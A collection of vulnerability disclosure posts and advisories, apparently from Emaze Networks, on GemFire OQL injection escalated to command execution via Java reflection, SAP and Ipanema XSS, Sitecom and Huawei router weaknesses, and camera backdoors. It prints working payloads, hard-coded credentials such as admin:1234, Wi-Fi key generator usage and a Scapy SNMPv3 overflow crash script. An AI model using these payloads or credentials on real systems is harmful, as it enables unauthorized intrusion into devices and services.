GemFire: From OQLi to RCE through reflection

Authors: Aristide Fattori (@joystick), Alessandro Di Pinto (@adipinto), Enrico Milanese (@ilmila)

During a penetration testing activity on one of our customers, we had to assess the security of some web services that interacted with an underlying GemFire database. GemFire is an in-memory distributed data management platform providing dynamic scalability, high performance, and database-like persistence.

During the analyses, we identified a straight injection vulnerability that could be easily exploited to dump data out of GemFire. However, this was not challenging enough, so we investigated if it could be further leveraged to escalate from a common ' OR '1'='1'-- injection to a juicer remote code execution.

Pivotal GemFire

GemFire offers a language OQL (Object Query Language) quite similar to SQL, with some limitations [1]. OQL injections are also very similar to classical SQL injections, they just require some care when crafting the attack, as many keywords are reserved for future use and not yet implemented (such as UNION). While skimming through the documentation, however, we stumbled upon a very interesting feature:

Invoking methods with parameters 
SELECT DISTINCT * FROM /exampleRegion p WHERE p.name.startsWith('Bo')

It is possible to invoke java methods on objects returned by OQL queries directly inside statements. While very useful for legitimate users, this is also an extremely dangerous feature. Indeed, through some hacks and with some limitations, it is possible to execute arbitrary java code, and even arbitrary commands.

Exploit

We will use an example to illustrate the exploit. Consider the following vulnerable query:

query = "SELECT DISTINCT * FROM /tab p WHERE p.name = '" + name + "'";

where 'name' is an attacker-controlled value. Our goal is to execute arbitrary commands on the victim machine, and in Java the fastest way to do that is:

Runtime.getRuntime().exec(command);

Unfortunately, Runtime did not appear to be already imported, nor we could use its full binary name inside the query. However, thanks to Java reflection API [2] we can easily overcome the problem and build this equivalent payload:

p.name.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(p.name.value.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null,null), 'command'.split('asd'))

Analyzing the payload, for those not familiar with reflection, the first step is:

getClass().forName('java.lang.Runtime')

and causes the class loader to load class Runtime. It is impossible to directly instantiate an object of this class; rather, you need to invoke the static method getRuntime() to obtain an instance. Method getDeclaredMethods() returns an array containing each Method declared in the class. It is possible to list them with a small snippet of code:

int i = 0; 
for(java.lang.reflect.Method m : "".getClass().forName("java.lang.Runtime").getDeclaredMethods()) {
  System.out.println(i++ + " " + m); 
}

In this case, we are interested in methods 7 and 15:

... 
7 public static java.lang.Runtime java.lang.Runtime.getRuntime() 
... 
15 public java.lang.Process java.lang.Runtime.exec(java.lang.String) throws java.io.IOException 
...

However, beware that these indexes may vary according to the JDK that is used on the victim machine, so be sure to compile and run the snippet above with a matching JDK. If you are not sure which indexes to use, you can leverage reflection to discover them, by building an injection vector such as:

name = "123456789' OR p.name.value.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].getName() = 'getRuntime'--

which will return true if method with index 7 is indeed getRuntime().

To invoke a method through reflection, we use Method.invoke(). Since getRuntime() is static and does not want any parameter, we can pass just null to both arguments of invoke().

// Equivalent to: Runtime.getRuntime()
p.name.value.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null,null) 

Our local java environment also accepted invoke() with just one null parameter, but this triggered an exception while trying to invoke it inside the OQL query. This is most likely due to the fact that the query processor of GemFire was unable to resolve the method and thus raised an exception.

Then, we must invoke exec() on the obtained Runtime instance, thus we leverage once again the invoke() method, but this time its first parameter will be the object returned by the piece of code to invoke getRuntime():

// Equivalent to: Runtime.getRuntime.exec(COMMAND)
p.name.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(p.name.value.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null,null), COMMAND) 

The final note is on COMMAND. There are many overloaded exec() methods in class Runtime, we use the simplest one that just takes the command to be executed as a String. However, to pass a String parameter to exec() through invoke(), we must pass an Object array with one element (i.e., the command String). We were not able to create an array inline with the standard java syntax. Thus, we leveraged an hack: calling split('asd') on a string which does not contain 'asd' will return an array of String with the string as the first and only element:

// Returns: {'command'}
'command'.split('asd') 

Thus, we get to the final payload:

p.name.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(p.name.value.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null,null), 'command'.split('asd'))

As a final note, in our Java environment (both openjdk-7-jdk and the official Oracle version), the second argument of invoke() can be directly a String (rather than array). This did not work inside GemFire, probably for the same reason described above.

Conclusions

Java Reflection based exploits are not novel, but always dangerous. For example, the Jboss SEAM framework was affected by a vulnerability that was exploited with a payload similar to the one we used in this case [3].

References

[1] http://community.gemstone.com/display/gemfire/Querying - Gemfire OQL
[2] http://docs.oracle.com/javase/tutorial/reflect/ - Java Reflection API
[3] CVE-2010-1871 - Jboss SEAM Remote Command Execution

Backdoor access to Techboard/Syac devices

Authors: Roberto Paleari (@rpaleari), and Luca Giancane

During a security assessment on one of our customers, we had the opportunity to analyze a device by Techboard/Syac, a manufacturer of digital video recorders (DVR) and network cameras. In particular, our analysis focused on a device of the DigiEye product line. The assessment led to the identification of a "backdoor" service, originally introduced by the device manufacturer for testing and support purposes, that could be abused by remote attackers to execute arbitrary commands on the device, with administrative privileges.

Vulnerability overview

Affected devices include a backdoor service listening on TCP port 7339. After a preliminary "authentication" phase, clients can leverage this service to execute arbitrary commands on the underlying Linux system, with root privileges. To the best of our knowledge, end-users are not allowed to disable the backdoor service, nor to control the "authentication" mechanism.

Vulnerable devices are still widely deployed on the Internet, thus we won't release the full details on the backdoor communication protocol. Instead, we just document in a following paragraph the initial "protocol handshake", in order to allow Techboard/Syac customers to identify vulnerable devices on their networks.

As a "proof-of-concept", the following figure shows the Python script we developed to complete the challenge-response authentication with the device and submit the commands to be executed (obviously, source and destination IP addresses have been obscured). As can be seed from the figure, the name of the process associated with port tcp/7339 is "backd", possibly a shorthand for "backdoor" (see the red box).

"Proof-of-concept" of the RCE backdoor on a Syac DigiEye device

A glimpse at the "authentication" protocol

Strictly speaking, the protocol handshake works as follows:

1. The client connects to port tcp/7339 of the vulnerable device and sends the string "KNOCK-KNOCK-ANYONETHERE?", terminated with a NULL byte.
2. The server replies with a 12-byte response. First 8 bytes are a timestamp, while last 4 bytes are a "magic number" equal to 0x000aae60.
3. Follows a challenge-response procedure that uses the timestamp provided by the server at step 2. Details of this step won't be disclosed.

After authentication has been completed, the client can send arbitrary commands which are immediately executed by the device with administrative privileges.

To allow customers to identify vulnerable devices on their network, we provide a Nmap NSE script, available for download here. Usage is very simple, as shown in the following screenshot.

Nmap NSE script to detect vulnerable devices (target IP as been obscured)

Conclusions

We contacted Techboard/Syac about this vulnerability on April 2nd, 2014 and provided them with the technical details of the issue we found. The device vendor promptly replied back to our e-mails and, on April 9th, they confirmed a patched firmware version was going to be released to their customers. At the time of writing, the patched firmware has not been checked by Emaze.

SAP Multiple Vulnerabilities

Advisory Information 
Title: SAP Multiple Vulnerabilities
Release date: 28/05/2014
Last update: 20/06/2014
Credits: Enrico Milanese, Emaze Networks S.p.A.

Vulnerability Information 
Class: Cross Site Scripting, Arbitrary Redirect
CVE: 2014-4159, 2014-4160, 2014-4161
CVSS: 5.8

Affected Software 

• SAP NetWeaver Business Client
• SAP Supplier Relationship Management Release 673 SP0

Vulnerability Details

The NWBC (NetWeaver Business Client) uses some test/debug nodes (related to development functionalities) that should be disabled in production systems; the node testcanvas is vulnerable to multiple Cross Site Scripting vulnerabilities on title and sap-accessibility parameters.

Proof of concept:

http://HOST/sap/bc/nwbc/~testcanvas/?title=<XSS1>&flags=est&roundtrips=1&sap-accessibility=<XSS2>

The SAP SRM (Supplier Relationship Management) component exposes a test/debug functionality related to SSO (Single Sign On) process; the resource umTestSSO.jsp fails to handle user input before using it into a dynamic generated content. 

The vulnerability could be used by an attacker to load any arbitrary remote html page inside the SAP SRM portal or conduct Cross Site Scripting attacks to SAP SRM portal's users.

Proof of concepts:

http://HOST/srm/la/umTestSSO.jsp?url=https://emaze.net/

http://HOST/srm/la/umTestSSO.jsp?url=";alert(document.cookie)//

Remediation

Apply the security patches provided by the vendor:

• Cross Site Scripting Vulnerability in NWBC
• https://service.sap.com/sap/support/notes/1932505
• Potential false redirection / Javascript Injection in SRM-LA
• https://service.sap.com/sap/support/notes/1946420

Sitecom firmware encryption and wireless keys

Authors: Roberto Paleari (@rpaleari) and Alessandro Di Pinto (@adipinto)

Last year we blogged about multiple security issues affecting Sitecom device models WLM-3500 and WLM-5500. One of these issues allowed attackers to obtain the default wireless passphrase of a vulnerable device in a "single shot", as the wireless key was derived from the device MAC address using an algorithm included inside the device firmware. This is a very serious issue, as many users never change the default Wi-Fi passphrase and keep using the one set by the device manufacturer.

We recently had the opportunity to analyze some other Sitecom routers, more precisely models WLR-4000 and WLR-4004. We were first attracted by this models due to the introduction of some mechanism to encrypt the firmware image distributed through Sitecom web site. To make a long story short, we soon realized the encryption layer could be easily circumvented; in addition, these routers were affected by the very same issue concerning the wireless passphrase: also for these models the key is derived from the MAC address, thus attackers can easily generate the default wireless key and access the LAN of a victim user.

Analysis of the firmware layout

In the following we briefly describe the analysis of the WLR-4004 firmware image (v1.23), but WLR-4000 differs only in minor details.

As a first step, to analyze an embedded device we typically try to download the firmware (when available) and inspect its contents. With WLR-4000/WLR-4004 devices we were lucky enough to find the firmware image on Sitecom web site. However, a preliminary analysis of the firmware  using binwalk provided no information about its internal structure:

$ binwalk 4004-FW-V1-23.bin
DECIMAL       HEX           DESCRIPTION
---------------------------------------------
$

This can be a symptom of a weird image format or, more often, an encrypted/obfuscated firmware. After we gave a quick look at the file entropy, we started to opt for the latter hypothesis. As an example, consider the low-entropy areas around 1.4MB and at the very end of the file:

File entropy for the WLR-4004 firmware image

A closer look to these regions provided some clues about the actual structure of the firmware image. As can be seen from the hex dump below, the final low-entropy area is due to the very same 8-byte sequence (88 44 a2 d1 68 b4 5a 2d, highlighted in red) that repeats until the end of the file.

$ dd if=4004-FW-V1-23.bin bs=$((0x0339720)) skip=1 | xxd | head
0000000: 00c6 ece0 c8f2 402e bdaa db83 d91d d987  ......@.........
0000010: b47d 4da1 987d 0f0d d64f 901a a6ae 056a  .}M..}...O.....j
0000020: 6d68 0219 3648 7980 4073 c849 ee04 5a2d  [email protected]
0000030: ef9c ae4f 68b5 f52f 104c a2d1 1d08 620a  ...Oh../.L....b.
0000040: b674 af5a 6ab4 5a2d 8845 fb8b fe71 472d  .t.Zj.Z-.E...qG-
0000050: 8844 a2d1 6c34 5a2d 8844 5617 75b4 5a2d  .D..l4Z-.DV.u.Z-
0000060: 8844 a2d1 68b4 5a2d 8844 a2d1 68b4 5a2d  .D..h.Z-.D..h.Z-
0000070: 8844 a2d1 68b4 5a2d 8844 a2d1 68b4 5a2d  .D..h.Z-.D..h.Z-
0000080: 8844 a2d1 68b4 5a2d 8844 a2d1 68b4 5a2d  .D..h.Z-.D..h.Z-
0000090: 8844 a2d1 68b4 5a2d 8844 a2d1 68b4 5a2d  .D..h.Z-.D..h.Z-
...

In an unencrypted firmware, the final bytes of the image are often used for padding and are thus initialized to zero (or to 0xff). But assuming our Sitecom firmware has been encrypted using some standard scheme, which algorithm would produce such a recurring pattern?

Our first attempt was to try with a basic XOR encryption, assuming a 8-byte key equal to byte sequence we observed before. The following Python snippet reads the encrypted image from standard input, performs the XOR and writes the result to standard output.

Firmware decryption routine for WLM-4004 images

After decrypting the firmware image we tried again to use binwalk to analyze the firmware. The results confirmed our hypothesis about a XOR algorithm being used to cipher the image: this time binwalk identified all the main components of a standard firmware image, including the kernel image (at offset 0xc0) and the root file system (offset 0x15d080).

$ cat 4004-FW-V1-23.bin | python decrypt.py > decrypted.bin
$ binwalk decrypted.bin

DECIMAL       HEX           DESCRIPTION
----------------------------------------------------------------------------------------
128           0x80          uImage header, header size: 64 bytes, header CRC: 0xAAB37DFB, created: Wed Jan 15 06:15:01 2014, ...
192           0xC0          LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 4240232 bytes
1429632       0x15D080      Squashfs filesystem, little endian, version 4.0, compression:  size: 1951490 bytes,  131 inodes, blocksize: 131072 bytes, created: Wed Jan 15 06:14:03 2014

 

Generation of the wireless key

We were finally able to analyze the contents of the firmware image (and, in particular, of the root file system) to search for any evidence of the wireless key generation algorithm. We were soon attracted by a rather "suspect" function exported by a shared library named libdbox.so; the function itself was named generate_wpa2_key_based_on_mac(). And yes, as you can probably imagine this is exactly the function we were looking for :-)

Function generate_wpa2_key_based_on_mac(), exported by libdbox.so

Similarly to the algorithm we found in WLM devices last year, the scheme used in WLR routers is also based on "scrambling" the MAC address and apply some character substitutions leveraging a hard-coded charset. The WLR-4000 and WLR-4004 only differ in the actual charset being used. More in detail, the algorithm is sketched out in the next figure.

A fragment of the key generation algorithm

As usual, we wrote a Python script that implements the attack (available here). The script receives in input the MAC address of the vulnerable Wi-Fi network and the router model name ("4000" for WLR-4000 and "4004" for WLR-4004) and generates the corresponding Wi-Fi key. A usage example is shown below.

$ python wlr-genpsk.py -m 4000 aa:bb:cc:dd:ee:ff
MAC:  aa:bb:cc:dd:ee:ff
SSID: SitecomDDEEFF
WPA:  ND68V8QLC6VS

$ python wlr-genpsk.py -m 4004 aa:bb:cc:dd:ee:ff
MAC:  aa:bb:cc:dd:ee:ff
SSID: SitecomDDEEFF
WPA:  C3N8VQEA2NVG 

Conclusions

Is not so uncommon for embedded device makers to rely on some obscure, and often custom-made, algorithms in order to generate secrets (e.g., Wi-Fi keys, admin passwords) starting from public details (e.g., MAC addresses, wireless SSID). Such approaches are quite handy for testing, debugging and manufacturing purposes. Even if it could be a very bad security practice, as long as the algorithm is sufficiently robust and is not leaked, no big issues arise.

However, in this blog post we shown how things can change when developers "forget" to remove an implementation of the algorithm from the final version of the device firmware: in these cases, it is just a matter of time until the code is found, analyzed and a key generator is developed, even when the device firmware image is "protected" by some obfuscation or encryption scheme.

Cross-Site Scripting Vulnerability on Ipanema Ip|Reporter Web

Advisory Information

Title: Cross-Site Scripting Vulnerability on Ipanema Ip|Reporter web v7.1  
Release date: 22/04/2013  
Last update:  30/08/2013
Credits: Cersosimo Fiorenzo (Emaze Networks S.p.A.)

Vulnerability Information
Class: Input Validation Vulnerability, Cross-site Scripting
CVE: 2013-3296 

Affected Software

We confirm the presence of the security vulnerability on the following product version:

• Ip|Reporter Web v7.1

Vulnerability Details 
Ip|reporter web can be exploited to cause a disclosure of the user’s session cookie, allowing an attacker to hijack the user session and take over the account. The vulnerability is on the page help.jsp, in the params displetid.

A proof of concept of the Reflected Cross-Site Scripting follows: 

• https://[host]/salsa/ipreporter_portal/[domain]/portal/help.jsp?rubricId=15;&displetid=164;%22%3C/script%3E%3Cscript%3Ealert%28123%29%3C/script%3E&parentid=150
  

Remediation
Patch is available on the support web site. 
  
Report Timeline
22/04/2013 - Vulnerability found.

23/04/2013 - Author sends a detailed email describing the vulnerability to the customer. 

23/04/2013 - Customer sends the detail to the Vendor.

29/04/2013 - Vendor opens a ticket to the supplier of the specific component.
17/06/2013 - Author sends an email to ask for an update.

18/07/2013 - Vendor replies that the patch has been released. 
30/08/2013 - Author notifies the intention to disclosure.
06/09/2013 - Disclosure.

 

Copyright

Copyright(c) Emaze Networks S.p.A. 2013, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

Disclaimer

Emaze Networks S.p.A. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community.
There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

Multiple vulnerabilities on Sitecom devices

Authors: Roberto Paleari (@rpaleari) and Alessandro Di Pinto (@adipinto)

One of our main activities at Emaze consists in analyzing embedded devices to identify security vulnerabilities that could be exploited by attacker to threaten end-users. In this blog post we focus on some issues that affect Sitecom N300/N600 devices, more precisely models WLM-3500 and WLM-5500 (...and possibly others).

The first vulnerability concerns the Wi-Fi network. Modern routers typically allow users to access the Internet also through a wireless connection. Obviously, Wi-Fi is crucial from a security perspective, as could allow nearby attackers (i.e., attackers located within the Wi-Fi network range) to access the user's local network. Unfortunately, in the past embedded devices have often been found to be affected by security vulnerabilities that allow attackers to access the Wi-Fi network, as we also demonstrated in previous blog posts. In the specific case of Sitecom devices, one of the issue we identified permits attackers to obtain the default wireless passphrase configured on the device. As many users don't change the predefined wireless key and keep using the default one, attackers can exploit this vulnerability to connect to the Wi-Fi network and access the victim's LAN.

In addition, we describe two vulnerabilities that permit remote attackers (i.e., attackers located anywhere on the Internet) to activate and access the Telnet service on the device, thus gaining full control over any aspect of the router.

Wireless key generation

Affected Sitecom devices are shipped with a 8-letter WPA/WPA2 passphase, printed on a stick attached under the device. The very same passphrase can  be also used to authenticate to the router web interface, with administrative privileges. At a first glance, this key seems just like a random sequence of eight lowercase and uppercase letters. However, our analysis revealed that this 8-letter key is not random at all, as it can be generated from publicly-accessible information, namely the MAC address of the wireless interface card.

Generating the WPA/admin passphrase from publicly-accessible information

This kind of issue is not new: in the past several other device models were shown to derive the wireless passphrase from the MAC address and/or the Wi-Fi SSID (e.g., Thomson, Huawei and many others). To the best of our knowledge, this is the first time Sitecom devices are also proved to be vulnerable.

More in detail, attackers can connect to a vulnerable Sitecom Wi-Fi network through a simple 3-step procedure:

1. Move inside the wireless network range and intercept the router Wi-Fi MAC address.
2. Apply the Sitecom key generation algorithm. This algorithm, starting from the Wi-Fi MAC address, generates the default WPA passphrase.
3. The generated WPA key can be used to access the victim's wireless network, unless the user has changed it configuring a different Wi-Fi passphrase.

Of course, the challenge for the attacker is to determine which algorithm was used to generate the WPA key starting from the Wi-Fi MAC address. In the case of the affected Sitecom routers, the key generation algorithm was included right inside the device firmware, and was used during a "factory reset" procedure to re-generate the default WPA passphrase.

To demonstrate this attack, we reconstructed the WPA key generation algorithm and implemented it in a Python script, available here. Usage is very simple: just invoke the script passing the MAC address of the target Wi-Fi network, as shown in the example below. The script outputs both the key for the WLM-3500 and the two passphrases for the dual-band WLM-5500.

$ python sitecomkeygen.py aa:bb:cc:dd:ee:ff
==== Single-band (N300/WLM-3500) ====
KEY 2.4GHz: DqzskECV

==== Dual-band (N600/WLM-5500) ====
KEY 5GHz:   1ju5YcPQ
KEY 2.4GHz: 1jgFz11Q

Unauthorized Telnet access

We also realized that unauthenticated remote users can enable the Telnet server by accessing the following (undocumented) URL:

http://<target-ip>/cgi-bin/telnetControl.cgi

This URL is accessible on the WAN side, i.e., it can be invoked by Internet-facing attackers. As soon as the URL is accessed, the Telnet server is enabled also on the WAN interface. In addition, attackers don't have to guess a valid username/password combination to login: Sitecom devices embed a hard-coded credential, "admin:1234", that can be used to authenticate to the Telnet service, with administrative (i.e., root) privileges. As this administrative account is hard-coded, it cannot be disabled nor changed by a normal user.

Remediation

All the security issues discussed in this blog post have already been notified to Sitecom. Sitecom has now released updated firmware versions to address the Telnet issues (firmware versions WLM-3500v2001 v1.08 and WLM-5501v1001 v2.01). Besides manual upgrade, patched software images are also distributed to end-users through the automatic firmware upgrade feature. 

Regarding the wireless passphrase issue, obviously Sitecom cannot distribute a modified firmware that changes the Wi-Fi key with a true random one, as this approach would make several users unable to access their Wi-Fi network. For this reason, we strongly recommend Sitecom users to immediately change their Wi-Fi passphrase, avoiding to use the default one.

In addition, Sitecom confirmed that the algorithm for the generation of WPA/admin passphrase discussed above is valid only for WLM-3500 and WLM-5501 devices. New device models should not be affected by the same issue.

Huawei B153 3G/UMTS router WPS weakness

Authors: Roberto Paleari (@rpaleari) and Alessandro Di Pinto (@adipinto)

Introduction

Last May we performed a security assessment involving a B153 device, a 3G/UMTS wireless router manufactured by Huawei.

During these tests, we identified a new, previously unknown, security issue that allows to instantaneously crack the WPA/WPA2 passphrase of any of these devices. In other words, by exploiting this vulnerability attackers can gain access to the victim's wireless network in a "single shot", without the need of any brute forcing.
All the tests were performed using a Huawei B153 device; other device models from the same family are probably also affected, but they were not tested.

As required by the ISP that distributes this device to end-users, we do not disclose the full commercial name of the product, but only the manufacturer device model (i.e., Huawei B153).

Vulnerability overview

Like many other Wi-Fi routers, the B153 device supports the WPS procotol, to allow wireless users to easily authenticate to the WPA/WPA2 network. In December 2011, one of the WPS methods, namely the "external registrar" PIN-based method, was demonstrated to be insecure by design, as attackers can brute force the configured PIN in just few hours. This attack is now implemented in publicly available exploitation tools, such as reaver.

We noticed that, in the default settings, B153 devices are configured to accept PIN-based WPS sessions. However, no WPS PIN is actually configured: attackers can spend hours trying all possible WPS PINs, but none of these PIN values will actually work. Nevertheless, the fact that the device actually replies to PIN-based WPS requests was quite suspicious, so we decided to investigate more deeply.

We spent some time analyzing the implementation of the WPS daemon running on the B153. We soon realized that, despite no WPS PIN is actually configured, a specially-crafted WPS session can still force the device to complete the handshake, revealing the current WPA2 passphrase. In other terms, attackers located within the wireless range of the device can instantly recover the WPA passphrase.

It should be considered that this vulnerability allows attacker to return the current WPA/WPA2 key: even if the user has modified the key, choosing a passphrase different than the default one, the attack still succeeds. Additionally, we would also like to stress out that this vulnerability is present in the default device configuration, thus no user action nor any specific customization is required.

Proof-of-concept attack

This attack cannot be performed using a "standard" WPS cracking tool, as it requires a peculiar modification to the WPS protocol implementation.

We implemented a proof-of-concept by modifying the reaver WPS cracking tool, introducing few modifications to the WPS implementation in order to exploit the vulnerability we identified on B153 devices. A sample session using our patched reaver tool is reported below, showing how WPA/WPA2 key is recovered in a "single shot", i.e., with a single WPS session.

$ sudo ./reaver -c 1 -i mon0 -b aa:bb:cc:dd:ee:ff -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

  ----------------------------------------------------------------
-=[ Patched by Emaze Networks to implement the Huawei B153 WPS attack ]=-
    ----------------------------------------------------------------

[+] Switching mon0 to channel 1
[+] Waiting for beacon from AA:BB:CC:DD:EE:FF
[+] Associated with AA:BB:CC:DD:EE:FF (ESSID: xxx79E0)
[+] Trying the "secret" pin :-)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPA PSK: '5D3FC94E'
[+] AP SSID: 'xxx79E0'
[+] Nothing done, nothing to save.

To protect end-users, we will not disclose the details of the attack, nor the reaver patch we developed. In fact, despite the device manufacturer now provides a firmware version that should address this vulnerability, to the best of our knowledge the new software is not deployed automatically on the affected devices, and vulnerable users are required to manually update their devices. Unfortunately, according to our experience, end-users apply security patches to their embedded devices very rarely.

Conclusions

We notified this security issue to the manufacturer on May 21st, 2013, providing a technical description of the attack and our proof-of-concept implementation of the exploit. Huawei released an updated firmware version that addresses this vulnerability. Emaze has still not tested the effectiveness of the security patch introduced in this new software version.

Hard-coded accounts on multiple network cameras

Advisory Information
Title: Hard-coded accounts on multiple network cameras
Discovery date: 05/06/2013
Release date: 11/07/2013
Credits: Roberto Paleari ([email protected], @rpaleari)
Alessandro Di Pinto ([email protected], @adipinto)

Vulnerability Information
Class: Authentication bypass, command execution

Affected Products

We confirm the presence of the security vulnerability on the following products/firmware versions:

• 3S Vision N1072 network camera, firmware version v1.07_STD-1
• 3S Vision N1073 network camera, firmware version v1.02_STD-1
• 3S Vision N3071 network camera, firmware version v1.05_STD-1
• Asante Voyager 1 network camera, firmware version v2.08
• Asante Voyager 2 network camera, firmware version v2.08
• ALinking ALC-9451/ALC-9452 network cameras, firmware version v1.33

Several other device manufacturers, models and firmware versions are probably also vulnerable, but they were not checked, mainly due to time constraints.

Vulnerability Details

The web server and RTSP daemon of the affected cameras include an hard-coded user account. Different device manufacturers (and camera models) use different hard-coded accounts. This issue can be abused by remote attackers to gain administrative access to the affected devices.

In the following, we report the hard-coded accounts for 3S Vision and Asante network cameras, as these are the only device manufacturers that were contacted and replies to our inquiries.

3S Vision cameras

• HTTP & RTSP account: 3sadmin:27988303

Asante Voyager 1 network cameras

• HTTP account: uniform:uic7799
• RTSP account: uicrd:xu06m3

Asante Voyager 2 network cameras

• HTTP & RTSP account: uicrd:xu06m3

As the account is hard-coded in the web server and RTSP server binary files, it cannot be changed by end-users without upgrading the whole firmware image (or manually patching the executable files).

Remediation

Asante released an updated firmware version that addresses this issue (firmware version 2.12). The patched firmware images for Voyager 1 and Voyager 2 devices are available on Asante web site. To the best of our knowledge, other device manufacturers have not addressed the issues described in this advisory, thus no updated firmware versions are available for their products.

Copyright

Copyright(c) Emaze Networks S.p.A. 2013, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

Disclaimer

Emaze Networks S.p.A. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

Multiple buffer overflows on Huawei SNMPv3 service

Advisory Information
Title: Multiple buffer overflows on Huawei SNMPv3 service
Discovery date: 11/02/2013
Release date: 06/05/2013
Credits: Roberto Paleari, Emaze Networks S.p.A (@rpaleari)

Vulnerability Information
Class: Memory errors

Affected Products

We confirm the presence of these security vulnerabilities on the following products:

• Huawei AR1220 (firmware version V200R002C02SPC121T)

According to Huawei security advisories [2,3] other products are also vulnerable, but they were not checked.

Vulnerability Details

The Huawei SNMPv3 service running on the affected devices is vulnerable to multiple stack-based buffer overflow issues. These vulnerabilities can be exploited by unauthenticated remote attackers.

The issues concern Huawei implementation of the SNMPv3 User-based Security Model (USM [1]). Strictly speaking, attackers can overflow the AuthoritativeEngineID and UserName SNMPv3 USM fields.

The vulnerabilities we identified can be classified according to the exploitation context: some issues can be triggered only when SNMP  debugging is enabled, while others are exploitable in the default device configuration.

The first class of issues can be exploited only when SNMP debugging is  enabled, as they are related with the debugging code that displays the content of incoming SNMP packets. Attackers can leverage these issues to  achieve RCE, but the actual impact is quite low, as SNMP debugging is usually disabled during normal operation.

The second class of vulnerabilities affects the SNMPv3 packet decoder. Differently than the previous ones, these issues can be exploited in the default device configuration. Additionally, it is worth considering that ACLs are ineffective at mitigating this threat, as SNMPv3 packets are processed by the device even if the sender's IP is not included in the ACL. Similarly, the vulnerabilities can be exploited even when no SNMPv3 users are configured.

In the following we include a "proof-of-concept" that exploit the latter category. Our PoC simply crashes the device, but the payload can probably  be also adapted to achieve RCE.

This Python example crashes the device by overflowing the UserName SNMPv3 USM field. Consider we used a slightly  modified version of Python Scapy library to properly support the SNMPv3 protocol. The complete Python script and the modified Scapy library can be provided upon request.

from scapy.all import *
def main():
    DST = "192.168.1.1"
    snmp = SNMPv3(version=3)
    pkt = IP(dst=DST)/UDP(sport=RandShort(), dport=161)/snmp
    pkt = snmpsetauth(pkt, "emaze", "MD5")
    pkt["SNMPv3"].flags = 4
    # Replace "user_name" with "auth_engine_id" in the next line to trigger the
    # other overflow
    pkt["SNMPv3"].security.user_name = "A"*4096
    pkt.show()
    send(pkt)
if __name__ == "__main__":
    main()

Remediation

The device manufacturer has released updated firmware versions that should remediate these issues. Huawei security advisories are available at [2,3].

Copyright

Copyright(c) Emaze Networks S.p.A. 2013, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

Disclaimer

Emaze Networks S.p.A. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

Footnotes
[1] http://www.ietf.org/rfc/rfc2574.txt
[2] http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-260601.htm
[3] http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-260626.htm